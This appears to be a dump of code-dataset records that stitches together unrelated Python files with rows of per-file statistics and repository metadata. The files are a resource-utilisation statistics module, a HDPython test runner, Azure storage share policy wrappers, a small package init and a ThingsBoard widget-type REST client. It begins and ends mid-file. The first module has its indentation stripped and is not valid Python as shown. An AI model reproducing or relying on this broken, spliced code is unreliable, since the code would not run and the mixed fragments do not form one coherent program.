statistics[compute] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
network = InfoGraphNodeCategory.NETWORK
data[network] = pandas.DataFrame()
statistics[network] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
storage = InfoGraphNodeCategory.STORAGE
data[storage] = pandas.DataFrame()
statistics[storage] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
memory = InfoGraphNodeCategory.MEMORY
data[memory] = pandas.DataFrame()
statistics[memory] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
# Calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
for node in local_subgraph.nodes(data=True):
layer = InfoGraphNode.get_layer(node)
is_machine = InfoGraphNode.node_is_machine(node)
if is_machine:
continue
if layer == InfoGraphNodeLayer.VIRTUAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
continue
# If hostname has been specified, need to take into account only
# nodes that are related to the specific host
attrs = InfoGraphNode.get_attributes(node)
allocation = attrs['allocation'] if 'allocation' in attrs \
else None
if hostname and not hostname == allocation:
continue
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
try:
utilization = utilization.drop('timestamp', 1)
except ValueError:
utilization = InfoGraphNode.get_utilization(node)
data[category] = pandas.concat([data[category], utilization])
for category in statistics:
if not data[category].empty:
mean = data[category]['utilization'].mean()
median = (data[category]['utilization']).median()
min = data[category]['utilization'].min()
maximum = data[category]['utilization'].max()
var = data[category]['utilization'].var()
std_dev = math.sqrt(var)
else:
mean = 0
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[category] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
return [data, statistics]
@staticmethod
def compute_node_resources(annotated_subgraph, hostname=None):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
# Calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
for node in local_subgraph.nodes(data=True):
layer = InfoGraphNode.get_layer(node)
if layer == InfoGraphNodeLayer.VIRTUAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
continue
type = InfoGraphNode.get_type(node)
if type == 'core':
continue
# If hostname has been specified, need to take into account only
# nodes that are related to the specific host
attrs = InfoGraphNode.get_attributes(node)
allocation = attrs['allocation'] if 'allocation' in attrs \
else None
if hostname and not hostname == allocation:
continue
name = InfoGraphNode.get_name(node)
statistics[name] = {'mean': 0,
'median': 0,
'min': 0,
'max': 0,
'var': 0,
'std_dev': 0}
utilization = InfoGraphNode.get_utilization(node)
try:
utilization = utilization.drop('timestamp', 1)
except ValueError:
utilization = InfoGraphNode.get_utilization(node)
data[name] = utilization
if not data[name].empty:
mean = data[name]['utilization'].mean()
median = (data[name]['utilization']).median()
min = data[name]['utilization'].min()
maximum = data[name]['utilization'].max()
var = data[name]['utilization'].var()
std_dev = math.sqrt(var)
else:
mean = 0
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[name] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
return [data, statistics]
@staticmethod
def workload(nodes):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
compute = InfoGraphNodeCategory.COMPUTE
data[compute] = pandas.DataFrame()
statistics[compute] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
network = InfoGraphNodeCategory.NETWORK
data[network] = pandas.DataFrame()
statistics[network] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
storage = InfoGraphNodeCategory.STORAGE
data[storage] = pandas.DataFrame()
statistics[storage] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
memory = InfoGraphNodeCategory.MEMORY
data[memory] = pandas.DataFrame()
statistics[memory] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
# Calculation of the fingerprint on top of the virtual resources
for node in nodes:
layer = InfoGraphNode.get_layer(node)
is_machine = InfoGraphNode.node_is_machine(node)
if is_machine:
continue
if layer == InfoGraphNodeLayer.PHYSICAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
continue
for category in statistics:
mean = data[category]['utilization'].mean()
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[category] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
return [data, statistics] | 39.337349 | 98 | 0.567917 | 1,287 | 13,060 | 5.648796 | 0.151515 | 0.048418 | 0.016506 | 0.018157 | 0.783769 | 0.770289 | 0.728473 | 0.724622 | 0.724622 | 0.710591 | 0 | 0.011129 | 0.33951 | 13,060 | 332 | 99 | 39.337349 | 0.831672 | 0.158346 | 0 | 0.75 | 0 | 0 | 0.070605 | 0.0024 | 0 | 0 | 0 | 0.01506 | 0 | 1 | 0.025 | false | 0 | 0.0125 | 0 | 0.070833 | 0.054167 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37d3f7148221c9ad90a3b4960464a66da3a8ac00 | 169 | py | Python | runTests.py | HardwareDesignWithPython/HDPython | aade03aaa092b1684fa12bffd17674cf1c45f5ac | [
"MIT"
] | null | null | null | runTests.py | HardwareDesignWithPython/HDPython | aade03aaa092b1684fa12bffd17674cf1c45f5ac | [
"MIT"
] | null | null | null | runTests.py | HardwareDesignWithPython/HDPython | aade03aaa092b1684fa12bffd17674cf1c45f5ac | [
"MIT"
] | 1 | 2021-10-20T20:08:16.000Z | 2021-10-20T20:08:16.000Z | import HDPython.tests
from HDPython.tests.helpers import remove_old_files
import HDPython.test_handler as test_handler
remove_old_files()
test_handler.run_all_tests() | 24.142857 | 52 | 0.863905 | 26 | 169 | 5.269231 | 0.5 | 0.240876 | 0.20438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08284 | 169 | 7 | 53 | 24.142857 | 0.883871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
535059007915efacc0f9f5d5d599478dcc76d10f | 6,169 | py | Python | pyaz/storage/share/policy/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/share/policy/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/share/policy/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | '''
Manage shared access policies of a storage file share.
'''
from .... pyaz_utils import _call_az
def create(name, share_name, account_key=None, account_name=None, connection_string=None, expiry=None, permissions=None, sas_token=None, start=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- expiry -- expiration UTC datetime in (Y-m-d'T'H:M:S'Z')
- permissions -- Allowed values: (d)elete (l)ist (r)ead (w)rite (d)elete (l)ist (r)ead (w)rite. Can be combined
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- start -- start UTC datetime (Y-m-d'T'H:M:S'Z'). Defaults to time of request.
'''
return _call_az("az storage share policy create", locals())
def delete(name, share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy delete", locals())
def show(name, share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy show", locals())
def list(share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy list", locals())
def update(name, share_name, account_key=None, account_name=None, connection_string=None, expiry=None, permissions=None, sas_token=None, start=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- expiry -- expiration UTC datetime in (Y-m-d'T'H:M:S'Z')
- permissions -- Allowed values: (d)elete (l)ist (r)ead (w)rite (d)elete (l)ist (r)ead (w)rite. Can be combined
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- start -- start UTC datetime (Y-m-d'T'H:M:S'Z'). Defaults to time of request.
'''
return _call_az("az storage share policy update", locals())
| 64.936842 | 365 | 0.755876 | 894 | 6,169 | 5.089485 | 0.107383 | 0.123077 | 0.105495 | 0.136264 | 0.963297 | 0.963297 | 0.963297 | 0.963297 | 0.963297 | 0.963297 | 0 | 0 | 0.174258 | 6,169 | 94 | 366 | 65.62766 | 0.893208 | 0.793646 | 0 | 0 | 0 | 0 | 0.146146 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
725a407aa4988fa07184d42ffea85463d0244ac4 | 105 | py | Python | mtd/__init__.py | IlyaTrofimov/MTopDiv | d9a19524c74cd35a30369b3f83cd944a7cbc6383 | [
"MIT"
] | 13 | 2021-11-18T09:05:12.000Z | 2022-03-08T22:04:19.000Z | mtd/__init__.py | IlyaTrofimov/MTopDiv | d9a19524c74cd35a30369b3f83cd944a7cbc6383 | [
"MIT"
] | 2 | 2021-11-17T11:11:16.000Z | 2021-12-23T15:31:36.000Z | mtd/__init__.py | IlyaTrofimov/MTopDiv | d9a19524c74cd35a30369b3f83cd944a7cbc6383 | [
"MIT"
] | null | null | null | from .barcodes import calc_cross_barcodes
from .barcodes import mtopdiv
from .barcodes import get_score
| 26.25 | 42 | 0.847619 | 15 | 105 | 5.733333 | 0.533333 | 0.418605 | 0.627907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12381 | 105 | 3 | 43 | 35 | 0.934783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7295f41c7e8d4d5ab49b100d6dbd050eb8dc9b39 | 35,765 | py | Python | tb_rest_client/api/api_pe/widget_type_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 30 | 2020-06-19T06:42:50.000Z | 2021-08-23T21:16:36.000Z | tb_rest_client/api/api_pe/widget_type_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 25 | 2021-08-30T01:17:27.000Z | 2022-03-16T14:10:14.000Z | tb_rest_client/api/api_pe/widget_type_controller_api.py | samson0v/python_tb_rest_client | 08ff7898740f7cec2170e85d5c3c89e222e967f7 | [
"Apache-2.0"
] | 23 | 2020-07-06T13:41:54.000Z | 2021-08-23T21:04:50.000Z | # coding: utf-8
"""
ThingsBoard REST API
ThingsBoard Professional Edition IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3PAAS-RC1
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class WidgetTypeControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_widget_type_using_delete(self, widget_type_id, **kwargs): # noqa: E501
"""Delete widget type (deleteWidgetType) # noqa: E501
Deletes the Widget Type. Referencing non-existing Widget Type Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_widget_type_using_delete(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_widget_type_using_delete_with_http_info(widget_type_id, **kwargs) # noqa: E501
else:
(data) = self.delete_widget_type_using_delete_with_http_info(widget_type_id, **kwargs) # noqa: E501
return data
def delete_widget_type_using_delete_with_http_info(self, widget_type_id, **kwargs): # noqa: E501
"""Delete widget type (deleteWidgetType) # noqa: E501
Deletes the Widget Type. Referencing non-existing Widget Type Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_widget_type_using_delete_with_http_info(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['widget_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_widget_type_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'widget_type_id' is set
if ('widget_type_id' not in params or
params['widget_type_id'] is None):
raise ValueError("Missing the required parameter `widget_type_id` when calling `delete_widget_type_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'widget_type_id' in params:
path_params['widgetTypeId'] = params['widget_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType/{widgetTypeId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_details_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types details for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type Details objects that belong to specified Widget Bundle.Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_details_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeDetails]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_details_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types details for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type Details objects that belong to specified Widget Bundle.Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeDetails]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_details_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_details_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_details_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypesDetails{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetTypeDetails]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_infos_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get Widget Type Info objects (getBundleWidgetTypesInfos) # noqa: E501
Get the Widget Type Info objects based on the provided parameters. Widget Type Info is a lightweight object that represents Widget Type but does not contain the heavyweight widget descriptor JSON Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_infos_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeInfo]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_infos_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get Widget Type Info objects (getBundleWidgetTypesInfos) # noqa: E501
Get the Widget Type Info objects based on the provided parameters. Widget Type Info is a lightweight object that represents Widget Type but does not contain the heavyweight widget descriptor JSON Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeInfo]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_infos_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_infos_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_infos_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypesInfos{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetTypeInfo]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type objects that belong to specified Widget Bundle.Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetType]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type objects that belong to specified Widget Bundle.Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetType]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypes{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetType]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_type_by_id_using_get(self, widget_type_id, **kwargs): # noqa: E501
"""Get Widget Type Details (getWidgetTypeById) # noqa: E501
Get the Widget Type Details based on the provided Widget Type Id. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_by_id_using_get(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_type_by_id_using_get_with_http_info(widget_type_id, **kwargs) # noqa: E501
else:
(data) = self.get_widget_type_by_id_using_get_with_http_info(widget_type_id, **kwargs) # noqa: E501
return data
def get_widget_type_by_id_using_get_with_http_info(self, widget_type_id, **kwargs): # noqa: E501
"""Get Widget Type Details (getWidgetTypeById) # noqa: E501
